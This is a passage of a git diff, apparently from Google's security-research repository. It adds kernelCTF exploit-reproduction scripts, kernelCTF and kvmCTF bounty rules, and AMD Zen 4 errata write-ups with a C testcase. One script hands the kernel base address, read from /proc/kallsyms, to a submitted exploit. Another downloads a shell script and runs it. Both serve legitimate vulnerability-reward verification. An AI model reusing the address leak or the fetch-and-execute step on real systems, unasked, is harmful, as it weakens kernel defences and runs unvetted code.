+ } + } +} \ No newline at end of file diff --git a/kernelctf/repro/init/init.sh b/kernelctf/repro/init/init.sh new file mode 100755 index 00000000..ad9b578d --- /dev/null +++ b/kernelctf/repro/init/init.sh @@ -0,0 +1,23 @@ +#!/bin/bash +set -ex +mount -t proc none /proc +mount -t sysfs none /sys + +mkdir /tmp/exp_ro +mount -t 9p exp /tmp/exp_ro + +mkdir /tmp/exp +chown user:user /tmp/exp +chmod a+rx /tmp/exp + +cp /tmp/exp_ro/* tmp/exp/ +chmod a+rx /tmp/exp/* + +CMD="/tmp/exp/exploit" +if [[ " $* " == *" kaslr_leak=1 "* ]]; then + KASLR_BASE=`head -n 1 /proc/kallsyms | cut -d " " -f1` + CMD="$CMD $KASLR_BASE" +fi + +echo "running exploit, cmd='$CMD', ::EXPLOIT OUTPUT FROM HERE::" +su user -c "$CMD" \ No newline at end of file diff --git a/kernelctf/repro.sh b/kernelctf/repro/repro.sh similarity index 80% rename from kernelctf/repro.sh rename to kernelctf/repro/repro.sh index d8bd12e8..9cd3c2f4 100755 --- a/kernelctf/repro.sh +++ b/kernelctf/repro/repro.sh @@ -16,6 +16,9 @@ touch $QEMU_TXT START_TIME=$(date +%s) +CMDLINE="console=ttyS0 root=/dev/vda1 rootfstype=ext4 rootflags=discard ro init=/init hostname=repro" +if [[ "$(echo $EXPLOIT_INFO | jq -e '.requires_separate_kaslr_leak')" == true ]]; then CMDLINE="$CMDLINE -- kaslr_leak=1"; fi + expect -c ' set timeout -1 set stty_init raw @@ -27,8 +30,9 @@ expect -c ' -nic user,model=virtio-net-pci \ -drive file=rootfs.img,if=virtio,cache=none,aio=native,format=raw,discard=on,readonly=on \ -drive file=flag,if=virtio,format=raw,readonly=on \ - -virtfs local,path=exp,mount_tag=exp,security_model=none \ - -append "console=ttyS0 root=/dev/vda1 rootfstype=ext4 rootflags=discard ro init=/init hostname=repro" \ + -virtfs local,path=init,mount_tag=init,security_model=none,readonly=on \ + -virtfs local,path=exp,mount_tag=exp,security_model=none,readonly=on \ + -append "'"$CMDLINE"'" \ -nographic -no-reboot expect "# " diff --git a/kernelctf/repro_summary.py b/kernelctf/repro_summary.py index bb0b045b..589d2968 100755 --- a/kernelctf/repro_summary.py +++ b/kernelctf/repro_summary.py @@ -3,6 +3,7 @@ import json import os import re +from utils import * with open("steps.json", "rt") as f: steps = json.loads(f.read()) @@ -52,7 +53,7 @@ def getLastLine(pattern): if repro_error: result += f"Error during reproduction: `{repro_error}`.\n\n" - expl_out = split('su user -c /tmp/exp/exploit') + expl_out = split('::EXPLOIT OUTPUT FROM HERE::\n') m = re.search(r"exploit.*?: (segfault at.*)", expl_out) if m: @@ -70,9 +71,10 @@ def getLastLine(pattern): """ +result = result.strip() print(result) -if "GITHUB_STEP_SUMMARY" in os.environ: - with open(os.environ["GITHUB_STEP_SUMMARY"], 'at') as f: f.write(result.strip() + "\n") +with open("repro_summary.md", "wt") as f: f.write(result) +ghSet("STEP_SUMMARY", result) os._exit(1 if success_count == 0 else 0) \ No newline at end of file diff --git a/kernelctf/rules.md b/kernelctf/rules.md index 36d0769f..39b82b97 100644 --- a/kernelctf/rules.md +++ b/kernelctf/rules.md @@ -20,26 +20,32 @@ This instance uses the latest LTS (currently 6.1) with [COS kernel config](https * Stability bonus (+$10.000) - * ~~Criteria: 90% of runs successfully steal the flag~~ + * Criteria: 90% of runs successfully steal the flag. - * Currently, all valid submissions receive this bonus (until the infrastructure required to enforcing this requirement is ready) + * More precisely, the [exploit_repro Github Action](https://github.com/google/security-research/blob/master/.github/workflows/kernelctf-submission-verification.yaml) reports `Reliability: 90%` or better in the `Reproduction summary` (after a sane amount of re-runs if needed) + + * If the exploit requires us to provide a KASLR base address, then it is ineligible for the bonus (`requires_separate_kaslr_leak` is true in `metadata.json` file). + + * Valid submissions with `Flag submission time` older than `2023-09-08T00:00:00Z` on the [public spreadsheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml) automatically get the bonus. * Reduced attack surface bonus (+$20.000) - * Criteria: Exploit works without using unprivileged user namespaces + * Criteria: Exploit works without using unprivileged user namespaces. - * Note: We may change the bonus definition from time to time (for example adding additional restrictions), but we will announce any changes at least 1 month in advance (see the "Program change notifications and communication" section) + * Note: We may change the bonus definition from time to time (for example adding additional restrictions), but we will announce any changes at least 1 month in advance (see the "Program change notifications and communication" section). * 0-day bonus (+$20.000) - * Criteria: you are exploiting a non-patched, non-disclosed vulnerability (see a more detailed definition in the section "0-day submissions" below) + * Criteria: You are exploiting a non-patched, non-disclosed vulnerability (see a more detailed definition in the section "0-day submissions" below). ### 2. Mitigation bypass (on the mitigation instance) -The mitigation instance is upgraded far less frequently than the LTS instance (currently staying on the base 6.1 commit), thus more 1-day vulnerabilities can be exploited. This way you have more opportunity to present your mitigation bypass techniques. +The mitigation instance is upgraded far less frequently than the LTS instance (currently staying on 6.1.55), thus more 1-day vulnerabilities can be exploited. This way you have more opportunity to present your mitigation bypass techniques. Only exploits which clearly bypass [our mitigations](https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README) are eligible (e.g. if a mitigation protects against UAF, but not against BoF, then an exploit using a BoF vulnerability is not eligible). +As the current instance (`mitigation-v3-6.1.55`) uses the `CONFIG_RANDOM_KMALLOC_CACHES` probabilistic memory allocator hardening, only exploits with at least 70% reliability are eligible (checked the same way as the LTS stability bonus). + #### Reward * $21.000 @@ -151,6 +157,8 @@ In this stage: * Save this exact file, you will need to send us this later. + * Try to keep this file to the minimum necessary, leave out large files like e.g. `vmlinux`, `bzImage` as they can be downloaded separately if needed. + 2. Submit the flag and the hash via [this form](https://forms.gle/JA3XVBdmSbFmhgZQ9) with the additional details requested. * Save the link as you’ll have to edit this form later. @@ -187,7 +195,7 @@ A submission will not be eligible as a 0-day submission if the vulnerability det * If you'd like to speed up the CVE publication process, please make sure you fill out all the details needed for the CVE when you fill out the form. This way the disclosure happens earlier and your submission will be processed faster. - 4. After the vulnerability is disclosed via a CVE or oss-sec, wait 30 days (recommendation, see notes below) and send us your exploit with the description of the exploitation technique via a PR to https://github.com/google/security-research/ (see required structure below). + 4. After the vulnerability is disclosed via a CVE or oss-sec, wait 30 days (recommendation, see notes below) and send us your exploit with the description of the exploitation technique via a PR to [the security-research repo](https://github.com/google/security-research/) (see required structure below). 5. Make sure that the PR is merged (this is a requirement to get a reward). @@ -257,7 +265,7 @@ The structure of this submission folder should be: * `metadata.json` - * Required, structured metadata information following [this JSON schema (version 2)](metadata.schema.v2.json). + * Required, structured metadata information following [this JSON schema (version 3)](metadata.schema.v3.json). * `docs/vulnerability.md` @@ -372,9 +380,9 @@ If possible, also include how stable your exploit is (e.g. it worked 90% of the ## Program change notifications and communication -We announce major program changes on [Google's Security Blog](https://security.googleblog.com/), but we may change minor, mostly technical details (like steps in the submission process) by changing this page and announcing the change on our [#kernelctf-announcements](https://discord.gg/AjGJ3acF2e) Discord channel. +We announce major program changes on [Google's Security Blog](https://security.googleblog.com/), but we may change minor, mostly technical details (like steps in the submission process) by changing this page and announcing the change on our [#kernelctf-announcements](https://discord.gg/yXue2RwDEA) Discord channel. -If you have any question regarding kernelCTF, feel free to ask on the [#kernelctf](https://discord.gg/A3qZcyaZ69) Discord channel. +If you have any question regarding kernelCTF, feel free to ask on the [#kernelctf](https://discord.gg/ECS5VnJZys) Discord channel. ## Non-kernel vulnerabilities diff --git a/kernelctf/simulator/.gitignore b/kernelctf/simulator/.gitignore new file mode 100644 index 00000000..6890eaed --- /dev/null +++ b/kernelctf/simulator/.gitignore @@ -0,0 +1,5 @@ +releases/ +ramdisk*.img +rootfs*.img +qemu*.sh +flag \ No newline at end of file diff --git a/kernelctf/simulator/local_runner.sh b/kernelctf/simulator/local_runner.sh new file mode 100755 index 00000000..826ca810 --- /dev/null +++ b/kernelctf/simulator/local_runner.sh @@ -0,0 +1,40 @@ +#!/bin/bash +set -e + +usage() { + echo "Usage: $0 [--root]"; + exit 1; +} + +INIT_FN="/home/user/run.sh" + +ARGS=() +while [[ $# -gt 0 ]]; do + case $1 in + --root) INIT_FN="/bin/bash"; shift;; + -*|--*) echo "Unknown option $1"; exit 1;; + *) ARGS+=("$1"); shift;; + esac +done +set -- "${ARGS[@]}" + +RELEASE_NAME="$1" +if [ -z "$RELEASE_NAME" ]; then usage; fi + +if [ ! -f "qemu_v2.sh" ]; then wget https://storage.googleapis.com/kernelctf-build/files/qemu_v2.sh; fi +chmod u+x qemu_v2.sh + +if [ ! -d "releases/$RELEASE_NAME" ]; then mkdir -p "releases/$RELEASE_NAME"; fi +if [ ! -f "releases/$RELEASE_NAME/bzImage" ]; then + wget -O "releases/$RELEASE_NAME/bzImage" "https://storage.googleapis.com/kernelctf-build/releases/$RELEASE_NAME/bzImage" +fi + +if [ ! -f "rootfs_v1.img" ]; then + wget https://storage.googleapis.com/kernelctf-build/files/rootfs_v1.img.gz + gzip -d rootfs_v1.img.gz +fi + +if [ ! -f "ramdisk_v1.img" ]; then wget https://storage.googleapis.com/kernelctf-build/files/ramdisk_v1.img; fi +if [ ! -f "flag" ]; then echo "kernelCTF{example_flag}" > flag; fi + +exec ./qemu_v2.sh "releases/$RELEASE_NAME" flag "$INIT_FN" \ No newline at end of file diff --git a/kernelctf/utils.py b/kernelctf/utils.py new file mode 100644 index 00000000..225f6e8d --- /dev/null +++ b/kernelctf/utils.py @@ -0,0 +1,103 @@ +import csv +import io +import json +import os +import subprocess +import re +import requests +import time +from urllib.parse import urlparse + +BASE_DIR = os.path.abspath(os.path.dirname(__file__)) +CACHE_DIR = f"{BASE_DIR}/.cache" + +errors = [] +warnings = [] + +def error(msg): + global errors + msg = msg.replace('\n', '\n ') + errors.append(msg) + print(f"\n[!] [ERROR] {msg}") + +def warning(msg): + global warnings + msg = msg.replace('\n', '\n ') + warnings.append(msg) + print(f"\n[!] [WARN] {msg}") + +def fail(msg): + print("\n[!] [FAIL] " + msg.replace('\n', '\n ')) + os._exit(1) + +def run(cmd): + try: + result = subprocess.check_output(cmd, shell=True).decode('utf-8').split('\n') + return result if result[-1] != "" else result[0:-1] + except subprocess.CalledProcessError as e: + fail(f"executing '{cmd}' failed with exit code {e.returncode}") + +def subdirEntries(files, subdir): + return list(set([f[len(subdir):].split('/')[0] for f in files if f.startswith(subdir)])) + +def formatList(items, nl=False): + return ('\n' if nl else '').join([f"\n - {item}" for item in items]) + +def printList(title, items): + print(f"\n{title}:" + formatList(items)) + +def errorList(errorMsg, items, warningOnly=False): + itemsStr = ", ".join(f"`{x}`" for x in items) + errorMsg = errorMsg.replace("", itemsStr) if "" in errorMsg else f"{errorMsg}: {itemsStr}" + if warningOnly: + warning(errorMsg) + else: + error(errorMsg) + +def checkOnlyOne(list, errorMsg): + if len(list) > 1: + errorList(errorMsg, list) + return list[0] + +def checkList(items, isAllowedFunc, errorMsg, warningOnly=False): + disallowedItems = [item for item in items if not isAllowedFunc(item)] + if len(disallowedItems) > 0: + errorList(errorMsg, disallowedItems, warningOnly) + return list(sorted(set(items) - set(disallowedItems))) + +def checkAtLeastOne(list, errorMsg): + if len(list) == 0: + fail(errorMsg) + +def checkRegex(text, pattern, errorMsg): + m = re.match(pattern, text) + if not m: + error(f"{errorMsg}. Must match regex `{pattern}`") + return m + +def fetch(url, cache_name=None, cache_time=3600): + if not cache_name: + cache_name = os.path.basename(urlparse(url).path) + cache_fn = f"{CACHE_DIR}/{cache_name}" + if cache_name and os.path.isfile(cache_fn) and (time.time() - os.path.getmtime(cache_fn) < cache_time): + with open(cache_fn, "rb") as f: return f.read().decode('utf-8') + + response = requests.get(url) + if response.status_code != 200: + fail(f"expected 200 OK for request: {url}") + + if cache_name: + os.makedirs(CACHE_DIR, exist_ok=True) + with open(cache_fn, "wb") as f: f.write(response.content) + + return response.content.decode('utf-8') + +def parseCsv(csvContent): + columns, *rows = list(csv.reader(io.StringIO(csvContent), strict=True)) + return [{ columns[i]: row[i] for i in range(len(columns)) } for row in rows] + +def ghSet(varName, content): + varName = f"GITHUB_{varName}" + print(f"[+] Writing {json.dumps(content)} to ${varName}") + if varName in os.environ: + with open(os.environ[varName], 'at') as f: f.write(content + "\n") diff --git a/kvmctf/metadata.schema.v1.json b/kvmctf/metadata.schema.v1.json new file mode 100644 index 00000000..3e3f1024 --- /dev/null +++ b/kvmctf/metadata.schema.v1.json @@ -0,0 +1,60 @@ +{ + "$id": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "$schema": "https://json-schema.org/draft/2020-12/schema", + "title": "kvmCTF submission metadata", + "type": "object", + "required": ["$schema", "submission_ids", "vulnerability", "exploits"], + "properties": { + "$schema": { + "const": "https://google.github.io/security-research/kvmctf/metadata.schema.v3.json" + }, + "submission_ids": { + "description": "Identifier(s) of the submission(s). Can be found on the public kvmCTF spreadsheet (https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml?gid=2095368189) after a valid flag was submitted via the submission form.", + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^exp[0-9]+$" + } + }, + "vulnerability": { + "type": "object", + "required": ["patch_commit", "cve", "affected_versions", "requirements"], + "properties": { + "summary": { + "type": "string", + "description": "Short, one line summary of the vulnerability" + }, + "patch_commit": { + "type": "string", + "pattern": "^https://git.kernel.org/pub/scm/linux/kernel/git/(torvalds|stable)/linux.git/commit/" + }, + "cve": { + "type": "string", + "pattern": "^CVE-[0-9]{4}-[0-9]{4,5}$" + }, + "affected_versions": { + "description": "Linux kernel versions affected by the vulnerability, inclusive range.", + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^[0-9]+(\\.[0-9]+)+(-rc[0-9]+)? - [0-9]+(\\.[0-9]+)+(-rc[0-9]+)?$" + } + }, + "syzkaller_reference": { + "pattern": "^https://syzkaller.appspot.com/" + } + } + }, + "exploits": { + "type": "object", + "additionalProperties": false, + "patternProperties": { + "^((lts-[0-9]+.[0-9]+(\\.[0-9]+)?)|(mitigation-[0-9]+\\.[0-9]+(\\.[0-9]+)?)|(cos-[0-9]{2,}-[0-9]+\\.[0-9]+\\.[0-9]+)|extra-.*)$": { + "type": "object" + } + } + } + } +} diff --git a/kvmctf/rules.md b/kvmctf/rules.md new file mode 100644 index 00000000..711e1aae --- /dev/null +++ b/kvmctf/rules.md @@ -0,0 +1,161 @@ +# kvmCTF rules + +kvmCTF is a part of the [Google VRP](https://bughunters.google.com/about/rules/6625378258649088/google-and-alphabet-vulnerability-reward-program-vrp-rules) and is focused on making exploiting Kernel-based Virtual Machine (KVM) vulnerabilities harder by inviting security researchers to demonstrate their exploitation techniques on 0-day and 1-day vulnerabilities on LTS kernel versions. Eventually we might add experimental mitigations to KVM that we would like to see if and how researchers can bypass them. + +We are asking researchers to publish their submissions, helping the community to learn from each other’s techniques. + +# Reward structure and targets + +## Target + +### Exploit for the LTS server +This instance uses the latest LTS kernel version (currently 6.1) with the [COS kernel config](https://cos.googlesource.com/third_party/kernel/+/refs/heads/cos-6.1/arch/x86/configs/lakitu_defconfig) but with `CONFIG_KVM=m`. +The host runs on an Intel(R) Xeon(R) Gold 5222 CPU @ 3.80GHz. \ +Participants will be connected to a Debian 11.7 (bullseye) guest that runs on a `v5.10.0-25` kernel compiled with the default Debian config. \ +The goal is to perform a successful guest-to-host attack. Currently we do not reward QEMU exploits or vulnerabilities. + +#### Rewards +* Full VM Escape: $99,999 +* Arbitrary (host) memory write: $34,999 +* Arbitrary (host) memory read: $24,999 +* Host Denial-of-Service: $14,999 + +Note that the above rewards do not stack. For example if you submit a full VM +escape exploit that uses an arbitrary memory write, you will be compensated with the +reward for the VM escape ($99,999) and not with two separate rewards ($99,999 + +$34,999). + +### Process +To try your exploit on our server you will have to reserve a time slot. You can do it using the command: + +`ssh kvmctf@kvmctf.vrp.ctfcompetition.com` + +and follow the prompts. Note that the reservations are done using the UTC time so please convert your desired time to UTC before reserving. You will need to provide an email address and you will be given a key. \ +To connect to the server during your reserved time slot you can use the same command as above. You will be asked to provide the email address you used to reserve the time slot and the key you received. After verification, you will be redirected to the server. + +## Additional eligibility rules +Only the first submission for a vulnerability is eligible for a reward. +If a patch commit fixes multiple vulnerabilities (e.g. by backporting a new version of a component to the stable tree), we assume the root cause is the same and we consider further submissions as duplicates. +If the same vulnerability is fixed in multiple patch commits (e.g. in commit A in the mainline tree and separately in commit B in the stable tree), then we still consider it as the same vulnerability, thus making further submissions duplicates. + +# Submission process +Note: Minor details of the submission process may change from time to time, please make sure you check this page again for updates when you make a new submission. +Submissions can target 0-day and 1-day bugs. +## Non-patched and 0-day submissions +We consider a bug 0-day if at the time of the submission: +* There is no patch commit in the mainline tree, and +* The vulnerability is not disclosed in any form (e.g. there is no Syzkaller report about the bug) + * Note: We may still consider a bug 0-day at our discretion (e.g. although the bug was disclosed by Syzkaller more than 30 days ago, there is no fix and you convince the maintainers to fix the bug) + +If the submission targets a bug which is not patched yet (0-day or 1-day without a patch), then the submission process has one additional initial stage. \ +The purpose of this additional stage is to make sure the vulnerability details are not shared with us before the patch is released but to still provide a 7-days long “protection window” for 0-day vulnerability founders in case some else makes a 1-day submission for the same vulnerability before the 0-day founder. \ +In this stage: +1. Exploit the bug and capture the flag from the target environment (the flag is a proof of successful exploitation). +2. Compress the exploit and its source code as a .tar.gz file and calculate its SHA256 checksum. + * Save this exact file, you will need to send us this later. + * Try to keep this file to the minimum necessary, leave out large files like e.g. vmlinux, bzImage as they can be downloaded separately if needed. +3. Submit the flag and the hash via [this form](https://forms.gle/Hu5EuMPieWHRdqXi8) with the additional details requested. + * Save the link as you’ll have to edit this form later. +4. Report the vulnerability to security@kernel.org within 7 days of the first form submission. + * Note: A submission will be considered ineligible if it turns out that this requirement was not respected. +5. Make sure that you are credited in the Reported-By tag of the patch that fixes the bug. + * Use the same email address in the Reported-By tag as you use for the form submission or in the “Email address used in Reported-By tag” field of the form. + * If there is no Reported-By tag on a patch commit, then a 0-day submission is eligible only if this is the first 0-day submission for that patch commit (based on the first stage submission date). + * If it is unclear who reported the bug, then the 0-day bonus can be split (multiple reporters), reduced, invalidated or the 0-day submission protection can be lost at our discretion. +6. Wait for the patch to land in a release candidate on the mainline tree (and tagged in Git), or committed on a stable tree. +7. Modify the form within 7 days by following the previously saved link and fill out the extra details as described below in the 1-day section. + * If the 7-day deadline is missed, then the first stage 0-day protection expires and other 1-day submissions can take priority over this submission (which makes this submission a duplicate and thus ineligible for reward). + +A submission will not be eligible as a 0-day submission if the vulnerability details were reported somewhere (e.g. Pwn2Own) other than [security@kernel.org](mailto:security@kernel.org). + +## Already patched, 1-day submissions + +1. Exploit the bug and capture the flag from the target environment (the flag is a proof of successful exploitation). +2. Submit the requested vulnerability details via [this form](https://forms.gle/Hu5EuMPieWHRdqXi8) (without including additional details on the exploitation technique for now). +3. Send us the description of the vulnerability via [bughunters.google.com](https://bughunters.google.com/) (please follow the process described below). +4. Wait for us to publish the CVE or publish the vulnerability details yourself on [oss-sec](https://seclists.org/oss-sec/). + * If you’d like to speed up the CVE publication process, please make sure you fill out all the details needed for the CVE when you fill out the form. This way the disclosure happens earlier and your submission will be processed faster. +5. After the vulnerability is disclosed via a CVE or oss-sec, wait 30 days (recommendation, see notes below) and send us your exploit with the description of the exploitation technique via a PR to https://github.com/google/security-research/ (see required structure below). +6. Make sure that the PR is merged (this is a requirement to get a reward). + +## Note about making the exploit public +You can publish your exploit at any time you would like to, but we recommend publishing the exploit 30 days after the vulnerability was disclosed. This gives the industry time to apply patches. Read our stance on the topic in [Google’s disclosure policy](http://about.google/appsecurity). + +We only process submissions after the exploit is public (and we can only issue rewards when the submission was processed), but not sooner than 30 days after the vulnerability disclosure. + +If you publish sooner than 30 days, you won’t get the reward faster. If you want to delay the publication (disclose later than 30 days), you could do that, but you would get the money later (we want to encourage you to publish the exploit details sooner than later). + +The above is about the exploit itself, not the vulnerability. We automatically share some limited vulnerability details of the submissions on our [public submission spreadsheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml?gid=2095368189), as a CVE, and as soon as you submit the vulnerability details via the form. + +## Exploit PR file structure +The submission should be put into the `pocs/linux/kvmctf//` folder within the [security-research](https://github.com/google/security-research/) repo, where: +* cve is the CVE number of the vulnerability in the format `CVE-yyyy-NNNNN` +* If there is a conflicting submission, then append `_2` (or `_3`, etc.) after the directory name. + +For example: `pocs/linux/kvmctf/CVE-2023-1872/`. + +The structure of this submission folder should be: +* `original.tar.gz` + * Required, contains the original exploit. Its hash must match the one submitted initially via the form (this hash cannot be modified later). +* `metadata.json` + * Required, structured metadata information following this [JSON schema (version 2)](https://google.github.io/security-research/kvmctf/metadata.schema.v1.json). +* `docs/vulnerability.md` + * Required, description of the vulnerability. +* `docs/exploit.md` + * Required, description of how the exploits work. If exploits are too different, then it can also be put next to exploits. +* `exploit/6.1.x/` + * `exploit.c` + * Required, source code of the exploit. + * `exploit` + * Required, compiled exploit which stole the flag. + * `Makefile` + * Required, includes target (`exploit`) to compile exploit.c into exploit and target (`run`) to run the exploit on the live instance (which steals the flag). + +You can add additional files (e.g. images for writeup or supporting libraries for the exploit). The exploit can be split into multiple files, although we prefer if it is kept as a single `.c` file. +# Documentation requirements +## Vulnerability +If possible please include the following information in the vulnerability details: +* Commit which introduced the vulnerability +* Commit which fixed the vulnerability +* Affected kernel versions +* Cause (UAF, BoF, race condition, double free, refcount overflow, etc) +## Exploit +Make sure that the exploit is properly commented and the accompanying exploit.md includes all the details, making it easy to understand what the exploit does. + +Give a step-by-step overview of the exploitation process. When describing the following activities, include them as a separate step: +* Triggering a vulnerability. +* Converting one attack primitive into another. +* Spraying or grooming the heap. +* Leaking host information. +* Overwriting host memory. +* Getting RIP control. +* Executing interesting post-RIP approaches. +* Doing a major step towards a successful exploitation which is not listed above. + +In the steps, include the affected objects (e.g. `struct file`), their role (e.g. vulnerable object, victim object), and their respective caches (e.g. `kmalloc-1k`) and the used field members of the object (e.g. getting RIP control via `file->ops->ioctl`, overwriting `msg_msg->security`). + +We expect the following parts to be properly documented: +* Non-trivial constant values should be explained, for example: + * Flag and enumeration values + * Field offsets + * Function addresses + * ROP gadget offsets +* ROP chain items should be explained. + * E.g. in `rop[0] = base + 0x123456;` explain that 0x123456 is resolved to e.g. `call_usermodehelper_exec`. +* Fake structures should be explained; i.e. which structure is created and what fields are set. + * E.g. `data[0x8] = base + 0x123456;` -> data variable contains a fake `struct file`, the field at 0x8 offset is a `f_inode` pointer which is set to ... +* Usage of multi-threading (or forking) + * Why is it needed? + * If a race condition is exploited, then what code paths are raced. + * Communication and synchronization between two the threads (e.g. what data was sent between the threads, and when the threads are waiting on each other). +* Separation between code parts which are needed to trigger the vulnerability and parts which are part of the exploitation process (spraying, heap grooming, cross-cache, converting one primitive to another). +* Any action (e.g. MSR update, hypercall) where a side-effect of the action is used for the exploit and not the main functionality, for example: + * Hypercall used for spraying a specific structure, not for its main purpose. + * Change of some MSR value with a non-trivial effect. + +If possible, also include how stable your exploit is (e.g. it worked 90% of the time during your testing) and whether your exploit requires a separate kASLR leak (or bruteforce). +# Additional information +## Program change notifications and communication +We announce major program changes on [Google’s Security Blog](https://security.googleblog.com/), but we may change minor, mostly technical details (like steps in the submission process) by changing this page and announcing the change on our #kvmctf-announcements Discord channel. + +If you have any question regarding kvmCTF, feel free to ask on the #kvmctf Discord channel. diff --git a/pocs/cpus/errata/amd/1386/README.md b/pocs/cpus/errata/amd/1386/README.md index 7e48df00..8cac9349 100644 --- a/pocs/cpus/errata/amd/1386/README.md +++ b/pocs/cpus/errata/amd/1386/README.md @@ -79,7 +79,7 @@ The code first writes a fixed value into `ymm0`, then forces a context switch wi syscall ``` -Now we zero `ymm0`, so it's previous value should be permanently lost. The +Now we zero `ymm0`, so its previous value should be permanently lost. The method here is not important, `VZEROALL` or loading some other value are all acceptable. diff --git a/pocs/cpus/errata/amd/genoa-evex-rsp/README.md b/pocs/cpus/errata/amd/genoa-evex-rsp/README.md new file mode 100644 index 00000000..3d1b0a68 --- /dev/null +++ b/pocs/cpus/errata/amd/genoa-evex-rsp/README.md @@ -0,0 +1,86 @@ +# The EVEX.X bit can load the wrong RSP value into vector registers + +

+Tavis Ormandy
+

+ +> *This document is a Work In Progress and represents an errata currently under investigation* + +## Introduction + +We have observed an error on the AMD Zen 4 family of processors with +EVEX encoded instructions that access the stack pointer. + +The error can be observed with instructions that operate on both vector +registers and general purpose registers simultaneously, such as `vpinsrw`, +`vmovq`, `vctsi2ss`, and so on. + +The error only occurs if you use `RSP` with these instructions. + +It would be a valid but unusual operation to use `RSP` with these instructions, +we believe it is unlikely that any compiler generated code is affected. + +## Details + +If you attempt to load the value of `RSP` into a vector register, the value +actually loaded may lag behind the actual stack pointer. + +We have confirmed the bug is reproducible on the following SKU: + +- `Family=0x19 Model=0x11 Stepping=0x01 Patch=0xa10113b` + +You can verify the current Model, Family, Stepping and Patch level by +examining `/proc/cpuinfo`. + +### Reproducing + +The program `zenrsp.c` is the testcase. + +It should not produce any output unless an affected core detected. + +#### Building + +``` +$ gcc -mavx512vl -o zenrsp zenrsp.c +``` + +#### Running + +The normal expected output of `zenrsp` should be empty. + +On an affected CPU, the output might look like this: + +``` +$ ./zenrsp +after 11125090: 0x697e1d18 vs 0x697e1d20 +after 23257786: 0x697e1d18 vs 0x697e1d20 +after 34307607: 0x697e1d18 vs 0x697e1d20 +after 80446822: 0x697e1d18 vs 0x697e1d20 +after 85419804: 0x697e1d18 vs 0x697e1d20 +after 110056364: 0x697e1d18 vs 0x697e1d20 +after 140417725: 0x697e1d18 vs 0x697e1d20 +after 152543052: 0x697e1d18 vs 0x697e1d20 +after 163199133: 0x697e1d18 vs 0x697e1d20 +after 177559018: 0x697e1d18 vs 0x697e1d20 +``` + +This indicates that sometimes the wrong value was loaded into a vector register. + +### Analysis + +The code simply manipulates `rsp` with a `push`/`pop` sequence, then loads +the stackpointer into `xmm13` with the following instruction: + +``` +{evex} vmovq xmm13, rsp +``` + +We believe that stack operations are not correctly considered dependencies when +the EVEX.X bit is set. + +This results in stale values occasionally being loaded into registers. + +## Conclusion + +It is not clear if any code ever loads the stack pointer into vector registers, +but it is not impossible, and we document it here for reference. diff --git a/pocs/cpus/errata/amd/genoa-evex-rsp/zenrsp.c b/pocs/cpus/errata/amd/genoa-evex-rsp/zenrsp.c new file mode 100644 index 00000000..de88db90 --- /dev/null +++ b/pocs/cpus/errata/amd/genoa-evex-rsp/zenrsp.c @@ -0,0 +1,60 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define __aligned __attribute__((aligned(32))) + +static uint64_t vpinsrw_testcase(uint64_t *correct) +{ + uint64_t regstate[2] __aligned = {0}; + register __m128i r1 asm("xmm13"); + + _mm256_zeroall(); + + // Record stack pointer so we know the correct value. + asm volatile ("mov %%rsp, %0" : "=m"(*correct)); + + // Trigger bug + asm volatile (".intel_syntax noprefix \n" + // The bug is that these stack operations are ignored by the vmovq. + "push rax \n" // stack += 8 + "pop rax \n" // stack -= 8 + //"{evex} vmovq xmm13, rsp \n" + ".byte 0x62 \n" // evex + // RXBR00mm + ".byte 0b00110001 \n" // P0 + // Wvvvv1pp + ".byte 0b11111101 \n" // P1 + // zLLbVaaa + ".byte 0b00001000 \n" // P2 + ".byte 0x6e, 0xec \n" // movq + ".att_syntax prefix \n" + ); + + // Grab the first word, which should be equal to sp, right? + _mm_storeu_si128((void *) regstate, r1); + return regstate[0]; +} + +int main(int argc, char **argv) +{ + uint64_t correct; + uint64_t result; + + for (uint64_t i = 0 ;; i++) { + result = vpinsrw_testcase(&correct); + + if (correct != result) { + fprintf(stderr, "after %llu: %#x vs %#x\n", i, result, correct); + } + } + return 0; +} diff --git a/pocs/cpus/errata/amd/genoa-lps-hps/README.md b/pocs/cpus/errata/amd/genoa-lps-hps/README.md new file mode 100644 index 00000000..d9e4b9ae --- /dev/null +++ b/pocs/cpus/errata/amd/genoa-lps-hps/README.md @@ -0,0 +1,105 @@ +# EVEX encoded MOVLPS/MOVHPS can modify incorrect destination +

+Tavis Ormandy
+

+ +> *This document is a Work In Progress and represents an errata currently under investigation* + +## Introduction + +We have observed an error on the AMD Zen 4 family of processors with +EVEX encoded `VMOVLPS` and `VMOVHPS`. + +The `MOVLPS` and `MOVHPS` instructions load two 32-bit packed single precision +floats from the source operand into the low or high 64-bits of a vector +register. + +To illustrate this, consider this minimal example: + +```asm +section .data + a: dd 0x11111111, 0x22222222 + b: dd 0x33333333, 0x44444444 + +section .text + movhps xmm0, [rel a] + movlps xmm0, [rel b] +``` + +The result should be `xmm0` has the value `0x22222222111111114444444433333333`. + +## Details + +It is possible to use a three operand form of these instructions, where the two +merged source operands are placed in a third destination operand. For example: + +``` + vmovhps xmm0, xmm1, [rel a] +``` + +Consider this sequence: + +```asm +section .data + data: dd 0x11111111, 0x22222222, 0x33333333, 0x44444444 + zero: dd 0,0,0,0 + +section .text + vmovdqu xmm0, [rel data] + vmovlps xmm1, xmm0, [rel zero] + vmovhps xmm17, xmm0, [rel zero] +``` + +The expected result would be: + +``` +xmm0 = 0x44444444333333332222222211111111 +xmm1 = 0x44444444333333330000000000000000 +xmm17 = 0x00000000000000002222222211111111 +``` + +However, on genoa we non-deterministically get `xmm1=0`. + +- `Family=0x19 Model=0x11 Stepping=0x01 